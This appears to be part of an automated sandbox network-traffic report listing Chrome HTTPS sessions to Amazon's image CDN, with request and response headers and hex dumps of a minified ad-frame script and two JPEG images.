                                                                                                                                                                                                        18192.168.2.449770151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC612OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        Origin: https://www.amazon.ae
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1375INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 31002
                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                        X-Amz-IR-Id: 6dacb469-d1a7-4273-ad3c-a3e25de9c412
                                                                                                                                                                                                        Cache-Control: max-age=15552000,public
                                                                                                                                                                                                        Last-Modified: Thu, 08 Aug 2024 13:22:33 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                        Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 191042
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:58 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100084-IAD, cache-ewr-kewr1740044-EWR
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 22 73 66 49 6d 70 72 65 73 73 69 6f 6e 22 2c 74 3d 22 4c 69 67 68 74 41 64 49 6d 70 72 65 73 73 69 6f 6e 22 2c 69 3d 22 76 69 65 77 61 62 6c 65 6c 61 74 65 6e 63 79 22 2c 61 3d 28 65 2c 74 2c 69 29 3d 3e 28 7b 63 73 61 4b 65 79 3a 65 2c 63 73 6d 4b 65 79 3a 74 2c 63 73 6d 4d 65 73 73 61 67 65 3a 69 7d 29 2c 73 3d 28 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 65 29 2c 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 74 29 2c 61 28 22 62 6f 64 79 45 6e 64 22 2c 22 62 65 22 29 29 2c 72 3d 28 61 28 22 63 6c 69 63 6b 54 6f 41 54 46 22 2c 22 61 66 22 29 2c 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65 22 2c 22 63 66 22 29 29 2c 6e 3d 28 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65
                                                                                                                                                                                                        Data Ascii: (()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 2e 70 61 79 6c 6f 61 64 2c 66 3d 76 6f 69 64 20 30 21 3d 3d 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 29 3f 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 3a 6e 75 6c 6c 2c 6e 75 6c 6c 3d 3d 3d 66 26 26 64 65 6c 65 74 65 20 43 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 7d 2c 49 3d 22 61 64 6c 6f 61 64 5f 72 65 6e 64 65 72 73 74 61 72 74 22 2c 53 3d 22 61 64 6c 6f 61 64 5f 72 65 6e 64 65 72 65 6e 64 22 2c 41 3d 22 69 6d 70 72 65 73 73 69 6f 6e 22 2c 5f 3d 22 76 69 65 77 61 62 69 6c 69 74 79 22 2c 4e 3d 22 75 6e 73 65 72 76 65 64 76 69 65 77 61 62 69 6c 69 74 79 22 2c 44 3d 22 61 64 6c 6f 61 64 3a 72 65
                                                                                                                                                                                                        Data Ascii: .payload,f=void 0!==(null==e?void 0:e.viewabilityStandards)?null==e?void 0:e.viewabilityStandards:null,null===f&&delete C.viewabilityStandards},I="adload_renderstart",S="adload_renderend",A="impression",_="viewability",N="unservedviewability",D="adload:re
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 74 68 69 73 2e 77 61 69 74 46 6f 72 4d 65 73 73 61 67 65 50 72 6f 63 65 73 73 65 64 3d 61 73 79 6e 63 20 65 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 3d 3e 74 68 69 73 2e 70 65 6e 64 69 6e 67 4d 65 73 73 61 67 65 73 2e 73 65 74 28 65 2c 74 29 29 29 2c 74 68 69 73 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 3d 65 3d 3e 7b 74 72 79 7b 63 6f 6e 73 74 20 69 3d 65 2e 64 61 74 61 2c 61 3d 69 2e 63 6f 6d 6d 61 6e 64 3f 69 2e 63 6f 6d 6d 61 6e 64 2e 73 70 6c 69 74 28 22 2e 22 29 3a 5b 5d 3b 6c 65 74 20 73 3d 74 68 69 73 2e 63 5b 61 5b 30 5d 5d 3b 66 6f 72 28 6c 65 74 20 65 3d 31 3b 65 3c 61 2e 6c 65 6e 67 74 68 26 26 73 3b 65 2b 2b 29 73 3d 73 5b 61 5b 65 5d 5d 3b 69 66 28 22 63 75 73 74 6f 6d 4d 65 73 73 61 67 65 22 3d 3d 3d 69 2e 63 6f 6d 6d 61 6e 64 29
                                                                                                                                                                                                        Data Ascii: this.waitForMessageProcessed=async e=>new Promise((t=>this.pendingMessages.set(e,t))),this.receiveMessage=e=>{try{const i=e.data,a=i.command?i.command.split("."):[];let s=this.c[a[0]];for(let e=1;e<a.length&&s;e++)s=s[a[e]];if("customMessage"===i.command)
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 74 68 28 22 3b 22 29 2c 63 3d 6e 2e 73 74 61 72 74 73 57 69 74 68 28 22 25 22 29 26 26 6f 2e 73 74 61 72 74 73 57 69 74 68 28 22 25 22 29 26 26 22 25 33 44 22 3d 3d 3d 6c 3b 69 3d 64 3f 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 61 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2b 51 29 3a 63 3f 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 2b 51 29 3a 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 61 2b 51 29 7d 77 68 69 6c 65 28 73 26 26 72 3c 31 30 29 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 74 7d 72 65 74 75 72 6e 20 69 7d 3b 63 6f 6e 73 74 20 5a 3d 28 65 2c 74 2c 69 2c 61 29 3d 3e 7b 74 72 79 7b 74 2e 63 6f 75 6e 74 4d 65 74 72 69 63 28 44 2c 31 29 2c 74 2e 6c 6f 67 43
                                                                                                                                                                                                        Data Ascii: th(";"),c=n.startsWith("%")&&o.startsWith("%")&&"%3D"===l;i=d?i.replace(K,X+a.replace(/&/g,"&amp;")+Q):c?i.replace(K,X+encodeURIComponent(a)+Q):i.replace(K,X+a+Q)}while(s&&r<10)}catch(h){return t}return i};const Z=(e,t,i,a)=>{try{t.countMetric(D,1),t.logC
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 68 7d 60 29 7d 2c 6c 65 3d 61 73 79 6e 63 20 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 61 77 61 69 74 28 61 77 61 69 74 20 66 65 74 63 68 28 65 29 29 2e 74 65 78 74 28 29 3b 72 65 74 75 72 6e 20 64 65 28 74 29 7d 2c 64 65 3d 65 3d 3e 7b 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 65 29 2e 63 72 65 61 74 69 76 65 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 65 7d 7d 2c 63 65 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 22 53 45 52 56 45 52 5f 53 49 44 45 22 3d 3d 3d 65 2e 63 72 65 61 74 69 76 65 2e 66 6c 6f 77 29 72 65 74 75 72 6e 20 61 3d 65 2e 68 74 6d 6c 43 6f 6e 74 65 6e 74 45 6e 63 6f 64 65 64 2c 73 3d 65 2e 68 74 6d 6c 43 6f 6e 74 65 6e 74 45 6e 63 6f 64 65 64 4c 65 6e 67 74 68 2c 7b 67 65 74 41 64 3a 61 73 79 6e 63 28 29 3d 3e 28 7b 63
                                                                                                                                                                                                        Data Ascii: h}`)},le=async e=>{const t=await(await fetch(e)).text();return de(t)},de=e=>{try{return JSON.parse(e).creative}catch(t){return e}},ce=(e,t)=>{if("SERVER_SIDE"===e.creative.flow)return a=e.htmlContentEncoded,s=e.htmlContentEncodedLength,{getAd:async()=>({c
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 69 73 2e 6d 70 2e 6f 6e 6d 65 73 73 61 67 65 3d 74 68 69 73 2e 63 6d 72 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 2c 74 68 69 73 2e 63 2e 63 6f 75 6e 74 4d 65 74 72 69 63 28 22 61 64 6c 6f 61 64 3a 69 66 72 61 6d 65 69 6e 69 74 69 61 6c 69 7a 65 64 22 2c 31 29 2c 74 68 69 73 2e 63 2e 6c 6f 67 43 73 61 45 76 65 6e 74 28 22 61 64 6c 6f 61 64 5f 69 66 72 61 6d 65 69 6e 69 74 69 61 6c 69 7a 65 64 22 29 2c 6e 65 77 20 52 28 77 69 6e 64 6f 77 2c 22 41 44 50 54 5f 53 46 5f 52 45 53 49 5a 45 5f 41 53 50 45 43 54 5f 52 41 54 49 4f 5f 39 30 39 32 32 36 22 29 2e 69 73 54 31 28 29 7c 7c 28 28 65 2c 74 29 3d 3e 7b 74 2e 64 69 73 61 62 6c 65 52 65 73 69 7a 65 46 75 6e 63 7c 7c 65 2e 73 65 6e 64 4d 65 73 73 61 67 65 28 22 72 65 73 69 7a 65 53 61 66 65 46 72 61 6d 65
                                                                                                                                                                                                        Data Ascii: is.mp.onmessage=this.cmr.receiveMessage,this.c.countMetric("adload:iframeinitialized",1),this.c.logCsaEvent("adload_iframeinitialized"),new R(window,"ADPT_SF_RESIZE_ASPECT_RATIO_909226").isT1()||((e,t)=>{t.disableResizeFunc||e.sendMessage("resizeSafeFrame
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 65 61 74 69 76 65 54 65 6d 70 6c 61 74 65 4e 61 6d 65 2c 61 73 79 6e 63 28 29 3d 3e 74 68 69 73 2e 6c 6f 61 64 41 64 28 74 29 29 3a 61 73 79 6e 63 28 29 3d 3e 7b 77 65 28 29 2c 74 68 69 73 2e 66 6f 72 63 65 52 65 6e 64 65 72 46 61 6c 6c 62 61 63 6b 45 78 70 65 72 69 65 6e 63 65 28 29 7d 3b 76 61 72 20 73 2c 72 2c 6e 7d 63 61 74 63 68 28 6f 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 2e 6c 6f 67 45 72 72 6f 72 28 22 43 6f 75 6c 64 6e 27 74 20 67 65 74 41 64 20 66 72 6f 6d 20 68 74 6d 6c 50 72 6f 76 69 64 65 72 22 2c 6f 29 2c 61 73 79 6e 63 28 29 3d 3e 7b 77 65 28 29 2c 74 68 69 73 2e 66 6f 72 63 65 52 65 6e 64 65 72 46 61 6c 6c 62 61 63 6b 45 78 70 65 72 69 65 6e 63 65 28 29 7d 7d 7d 2c 74 68 69 73 2e 65 6e 73 75 72 65 47 6c 6f 62 61 6c 73 3d 28 29 3d 3e
                                                                                                                                                                                                        Data Ascii: eativeTemplateName,async()=>this.loadAd(t)):async()=>{we(),this.forceRenderFallbackExperience()};var s,r,n}catch(o){return this.c.logError("Couldn't getAd from htmlProvider",o),async()=>{we(),this.forceRenderFallbackExperience()}}},this.ensureGlobals=()=>
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 62 61 63 6b 53 74 61 74 69 63 41 64 48 65 6c 70 65 72 28 29 2c 74 68 69 73 2e 65 6e 73 75 72 65 47 6c 6f 62 61 6c 73 28 29 2c 74 68 69 73 2e 6d 70 2e 6f 6e 6d 65 73 73 61 67 65 3d 74 68 69 73 2e 63 6d 72 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 7d 2c 74 68 69 73 2e 6c 6f 61 64 41 64 3d 61 73 79 6e 63 20 65 3d 3e 7b 74 68 69 73 2e 6f 2e 69 73 4e 6f 49 6e 76 65 6e 74 6f 72 79 3d 21 31 2c 66 65 28 74 68 69 73 2e 63 2c 74 68 69 73 2e 6f 2c 74 68 69 73 2e 63 6d 73 29 3b 6c 65 74 20 74 3d 59 28 74 68 69 73 2e 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 50 61 72 61 6d 2c 65 29 3b 74 68 69 73 2e 69 73 56 69 64 65 6f 28 29 3f 6e 65 77 20 52 28 77 69 6e 64 6f 77 2c 22 41 44 50 54 5f 53 46 5f 41 44 53 50 5f 56 49 44 45 4f 5f 38 33 33 34 31 39 22 29 2e 69 73 54 31 28
                                                                                                                                                                                                        Data Ascii: backStaticAdHelper(),this.ensureGlobals(),this.mp.onmessage=this.cmr.receiveMessage},this.loadAd=async e=>{this.o.isNoInventory=!1,fe(this.c,this.o,this.cms);let t=Y(this.clickTrackingParam,e);this.isVideo()?new R(window,"ADPT_SF_ADSP_VIDEO_833419").isT1(
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 74 2e 6c 6f 67 45 72 72 6f 72 28 22 45 72 72 6f 72 20 61 70 70 65 6e 64 69 6e 67 20 62 6c 61 6e 6b 41 64 53 63 72 69 70 74 22 2c 69 29 7d 7d 2c 76 65 3d 65 3d 3e 21 21 28 22 74 72 75 65 22 21 3d 3d 65 2e 61 62 70 41 63 63 65 70 74 61 62 6c 65 26 26 65 2e 61 62 70 53 74 61 74 75 73 26 26 65 2e 65 6e 61 62 6c 65 46 61 6c 6c 62 61 63 6b 46 6f 72 41 62 70 53 74 61 74 75 73 65 73 26 26 65 2e 65 6e 61 62 6c 65 46 61 6c 6c 62 61 63 6b 46 6f 72 41 62 70 53 74 61 74 75 73 65 73 2e 69 6e 64 65 78 4f 66 28 6d 5b 65 2e 61 62 70 53 74 61 74 75 73 5d 29 3e 2d 31 29 2c 70 65 3d 61 73 79 6e 63 20 65 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 3d 3e 7b 6c 65 74 20 69 3d 2d 31 3b 63 6f 6e 73 74 20 61 3d 65 3d 3e 7b 63 6f 6e 73 74 20 61 3d 65 2e 64 61 74 61 2c 73 3d 22
                                                                                                                                                                                                        Data Ascii: t.logError("Error appending blankAdScript",i)}},ve=e=>!!("true"!==e.abpAcceptable&&e.abpStatus&&e.enableFallbackForAbpStatuses&&e.enableFallbackForAbpStatuses.indexOf(m[e.abpStatus])>-1),pe=async e=>new Promise((t=>{let i=-1;const a=e=>{const a=e.data,s="


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        19192.168.2.449768151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC683OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 1943
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: fdd8ed87-b2ae-4df0-97db-85eca2fa46e6
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Tue, 25 Aug 2043 06:55:09 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 189838
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:58 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000132-IAD, cache-ewr-kewr1740045-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 7e 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 08 04 05 06 07 09 01 03 02 10 00 01 03 03 01 06 03 05 07 02 07 00 00 00 00 00 01 00 02 03 04 05 11 06 07 12 21 31 41 51 13 61 71 15 22 52 81 91 08 14 23 82 92 b1 c1 42 b3 32 33 44
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"~!1AQaq"R#B23D
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC565INData Raw: e6 f3 03 91 1d c0 e8 47 50 a4 1b f7 ec eb 7b 90 9b a5 a4 9c c7 b8 26 8f b3 78 86 3f f5 29 36 a2 6f d9 e2 22 db cd cc 81 ee 8a 2f a1 7c 8c 21 4b 24 d5 c1 11 14 51 11 10 11 11 01 11 10 6a 8d b8 6f 8d 2b 5e e6 72 6c b4 9b de 9e 33 14 0b 75 56 61 9a 03 dc e3 f7 0b a6 5a 92 c5 16 a1 b6 d7 db 26 e0 da a8 1e c0 e2 33 b8 e2 3d c7 e3 ae e3 b0 e5 cd 1b 85 b6 6a 09 e6 86 a9 85 92 40 f7 32 56 1e 6c 73 0e e9 f5 00 ab 89 aa 38 65 12 d3 c4 fe b1 92 d2 3d 78 85 4e e0 e3 8e e4 fe dc 57 a6 8d f4 ef df 67 16 bb fc 4d fe 47 a2 af 31 71 6f cd 54 56 db 62 f0 e3 2e ea e3 fb 2b 98 54 34 dc 1b bb d9 54 87 63 00 f5 41 52 d7 61 7e f7 f8 15 f1 05 66 ba 0b 46 4b ab ee 2c a5 19 10 47 87 54 ca 39 46 ce d9 f8 e4 e4 d1 ea 79 02 82 43 ec 17 4f ba 82 cf 35 c6 51 87 dc 1e 0b 47 68 a2 e0 cf
                                                                                                                                                                                                        Data Ascii: GP{&x?)6o"/|!K$Qjo+^rl3uVaZ&3=j@2Vls8e=xNWgMG1qoTVb.+T4TcARa~fFK,GT9FyCO5QGh


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        20192.168.2.449769151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC699OUTGET /images/G/39/Associates/XCM_Manual_Budget_store_DQC_5b30ed29-b351-4c7c-ae2c-885863964831._SY116_CB613590867_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3980
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: b7e8c38c-8245-4c81-bdd9-86309d5e8ac8
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Feb 2023 12:27:45 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Thu, 03 Mar 2044 20:10:39 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 201973
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:58 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000052-IAD, cache-ewr-kewr1740075-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9e 00 01 00 03 00 03 01 00 00 00 00 00 00 00 00 00 00 00 01 05 06 02 04 07 03 10 00 02 01 03 03 02 04 04 04 04 02 0b 00 00 00 00 01 02 11 00 03 04 12 21 31 05 41 06 13 22 51 32 61 71 a1 14 81 91 b1 15 23 42 72 b2 e1 07 25 33 43 53 73 82
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"Q2aq#Br%3CSs
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 3d 7a 44 45 03 06 7d cd f8 4a 73 6c 01 bb 5c 9f 65 bf b5 f8 0f 16 e3 be 1d b4 64 0a 49 46 2c 1d ed 18 f4 90 65 bb 82 08 24 fb 77 15 e1 d7 6d 3d 87 7b 4e 21 91 98 1f aa 98 35 e8 1d 33 a9 e6 e2 de 47 54 f2 a5 87 ab ca 2a 3f 22 66 b2 99 36 9f 3b 3f 20 3b 7a 9e e1 25 a3 92 c4 4e c0 40 e6 a8 31 cc 14 b3 a5 23 39 27 a6 ba dc ad 9a 04 e6 78 5d 7d 2d 1d 55 51 51 5c 9d 74 b3 2f b1 23 f4 31 51 cd 73 05 b6 36 2b b6 bd c5 c2 52 a2 a6 b0 84 a9 a8 a5 2d 90 b9 52 a2 a6 97 4a 16 8e 94 a5 61 46 4a 52 94 21 29 5f 4b 76 9e e9 d2 82 4f ed f5 3c 0a fa dc c3 bb 6f 54 af c3 13 04 12 bf 51 4c 18 e2 2e 06 c9 4c 8d 1b 13 ba e9 66 0c 1b 56 d3 26 e9 0c e3 25 16 fa 07 69 b7 64 6b 2c e0 2f 0d a5 55 77 da 20 90 35 86 ae 58 dd 37 cb bc 89 6f 21 6e be 3b dd 17 e0 c5 b7 47 46 36 5e c3 05
                                                                                                                                                                                                        Data Ascii: =zDE}Jsl\edIF,e$wm={N!53GT*?"f6;? ;z%N@1#9'x]}-UQQ\t/#1Qs6+R-RJaFJR!)_KvO<oTQL.LfV&%idk,/Uw 5X7o!n;GF6^
